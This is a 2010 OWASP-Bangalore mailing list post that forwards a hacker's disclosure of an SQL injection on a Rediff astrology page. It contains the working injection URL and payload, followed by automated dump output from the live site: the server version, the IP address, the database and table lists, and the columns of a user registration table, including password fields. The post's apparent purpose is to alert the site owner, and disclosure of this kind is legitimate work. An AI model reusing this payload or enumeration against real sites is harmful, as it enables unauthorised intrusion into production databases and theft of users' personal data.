[OWASP-Bangalore] Rediff Astrology
Soi, Dhruv
dhruv.soi at owasp.org
Mon Jun 14 13:47:28 EDT 2010
Another one to notify Rediff that readers' daily fortune can be fixed by
someone.Seems Rediff needs a lot of OWASP, do inform them that its free!!
From: "Jack H4xor"
Sent: 14 June 2010 12:07
To: dhruv.soi at owasp.org
Subject: Rediff Astrology
y0,
h0rr1bl3 th4n h0rr0r
Vulnerable Url :
http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzodiac=Sco
rpiox%27%20OR%201=convert%28int,@@version%29--
********************************************************************
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ -== MSSQL Information Schema astrology.rediff.com ==- +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[ + ] URL :
http://astrology.rediff.com/zodiaczone/astroparents-resultpg.asp?pzo
diac=Scorpiox'
[ + ] Date: Tue May 18 20:58:26 2010
[ + ] Displaying information about MSSQL host !
[ + ] @@VERSION : Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195:
Service
Pack 4)
[ + ] USER () : dbo
[ + ] S_USER () : astrology
[ + ] DB_NAME () : astro
[ + ] HOST_NAME () : ASTROLOGY
[ + ] SERVER_NAME () : SEARCHDB
[ + ] SERVER_TYPE () : Microsoft-IIS/6.0
[ + ] X-POWERED-By () : ASP.NET
[ + ] IP_ADDRESS_INFO : 202.54.124.173
[ - ] We Can't get number of Databases !
[ ! ] Start dumping database Names !
[ ? ] But first choice number of DB to dump :> 20
[ + ] Displaying list of 20 databases on this MSSQL host !
[ DATABASE: 0 ] : astro
[ DATABASE: 1 ] : master
[ DATABASE: 2 ] : tempdb
[ DATABASE: 3 ] : model
[ DATABASE: 4 ] : msdb
[ DATABASE: 5 ] : pubs
[ DATABASE: 6 ] : Northwind
[ DATABASE: 7 ] : travel
[ DATABASE: 8 ] : travel_int
[ DATABASE: 9 ] : astro
[ DATABASE: 10 ] : Jobsearch
[ DATABASE: 11 ] : astroyogiD
[ DATABASE: 12 ] : matrimonial
[ DATABASE: 13 ] : investornew
[ DATABASE: 14 ] : test
[ ! ] Vulnerability Database is : astro
[ + ] Displaying Tables inside DB :> astro
[ ? ] Numbers of Tables To Dispaly ?
[ + ] Specify Numbers :> 200
[ TABLES: 0 ] : ALLIANCE_PARTNER_COMMISSION
[ TABLES: 1 ] : ALLIANCE_PARTNER_MASTER
[ TABLES: 2 ] : astrolove
[ TABLES: 3 ] : astroparent
[ TABLES: 4 ] : CITY
[ TABLES: 5 ] : COMPLETE_ORDER_DETAIL
[ TABLES: 6 ] : COMPLETE_SUBSCRIPTION_DETAIL
[ TABLES: 7 ] : COUNTRY
[ TABLES: 8 ] : CUSTOMER_CARE_DETAILS
[ TABLES: 9 ] : CUSTOMER_CARE_MASTER
[ TABLES: 10 ] : CUSTOMER_PERSON1
[ TABLES: 11 ] : CUSTOMER_PERSON2
[ TABLES: 12 ] : CUSTOMER_PERSON3
[ TABLES: 13 ] : darshtest
[ TABLES: 14 ] : dtproperties
[ TABLES: 15 ] : FENGSHUI
[ TABLES: 16 ] : FRANCHISEE_MASTER
[ TABLES: 17 ] : idealmate
[ TABLES: 18 ] : INTERNATIONAL_PARTNER_MASTER
[ TABLES: 19 ] : NUMEROLOGY
[ TABLES: 20 ] : ORDER_DETAILS
[ TABLES: 21 ] : ORDER_MASTER
[ TABLES: 22 ] : ORDER_REMARKS
[ TABLES: 23 ] : ORDERS
[ TABLES: 24 ] : p1
[ TABLES: 25 ] : p3master
[ TABLES: 26 ] : PALMISTRY
[ TABLES: 27 ] : PAYMENT_METHOD_MASTER
[ TABLES: 28 ] : PROBLEM_ANSWER
[ TABLES: 29 ] : PROBLEM_CATEGORY
[ TABLES: 30 ] : REGISTRATION
[ TABLES: 31 ] : SHIPPING_DETAILS
[ TABLES: 32 ] : SPCFIC_ANLYS
[ TABLES: 33 ] : SUBSCRIBER_DETAILS
[ TABLES: 34 ] : SUBSCRIBER_MASTER
[ TABLES: 35 ] : SUBSCRIBER_REGISTRATION
[ TABLES: 36 ] : SUBSCRIBER_TRANSACTION
[ TABLES: 37 ] : SUBSCRIPTION_DETAILS
[ TABLES: 38 ] : SUBSCRIPTION_MASTER
[ TABLES: 39 ] : sysconstraints
[ TABLES: 40 ] : syssegments
[ TABLES: 41 ] : test
[ TABLES: 42 ] : USER_ASTROLOGER_PRODUCT_TRANSACTION
[ TABLES: 43 ] : zodiac
[ + ] Done !
[ + ] Start dumping all Columns from table :> REGISTRATION
[ ? ] Numbers of Columns To Display ?
[ + ] Specify Numbers :> 50
[ + ] Displaying 50 Columns inside Table: REGISTRATION and Database: astro
[ COLUMNS : REGISTRATION ] 0 ] : FRANCHISEE_ID
[ COLUMNS : REGISTRATION ] 1 ] : PARTNER_ID
[ COLUMNS : REGISTRATION ] 2 ] : REGISTRATION_ADDRESS
[ COLUMNS : REGISTRATION ] 3 ] : REGISTRATION_BIRTH_COUNTRY
[ COLUMNS : REGISTRATION ] 4 ] : REGISTRATION_BIRTH_DATE
[ COLUMNS : REGISTRATION ] 5 ] : REGISTRATION_BIRTH_PLACE
[ COLUMNS : REGISTRATION ] 6 ] : REGISTRATION_BIRTH_TIME_HOUR
[ COLUMNS : REGISTRATION ] 7 ] : REGISTRATION_BIRTH_TIME_MINUTES
[ COLUMNS : REGISTRATION ] 8 ] : REGISTRATION_CELL_NO
[ COLUMNS : REGISTRATION ] 9 ] : REGISTRATION_COUNTRY
[ COLUMNS : REGISTRATION ] 10 ] : REGISTRATION_DATE
[ COLUMNS : REGISTRATION ] 11 ] : REGISTRATION_EMAIL_ID
[ COLUMNS : REGISTRATION ] 12 ] : REGISTRATION_FIRSTNAME
[ COLUMNS : REGISTRATION ] 13 ] : REGISTRATION_GENDER
[ COLUMNS : REGISTRATION ] 14 ] : REGISTRATION_ID
[ COLUMNS : REGISTRATION ] 15 ] : REGISTRATION_IP
[ COLUMNS : REGISTRATION ] 16 ] : REGISTRATION_LASTNAME
[ COLUMNS : REGISTRATION ] 17 ] : REGISTRATION_PASSWORD
[ COLUMNS : REGISTRATION ] 18 ] : REGISTRATION_TELEPHONE_NO
[ COLUMNS : REGISTRATION ] 19 ] : REGISTRATION_USERNAME
[ ! ] Done !
[ ! ] All information was recorded in astrology.rediff.com.txt file !
[ 1 ] : Return to Tables !
[ 2 ] : Return to Columns !
[ ? ] : Oprion :>
Thanks & Regards
Jackh4xor
( h4cky0u )
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-bangalore/attachments/20100614/eeb1081b/attachment-0001.html
More information about the OWASP-Bangalore
mailing list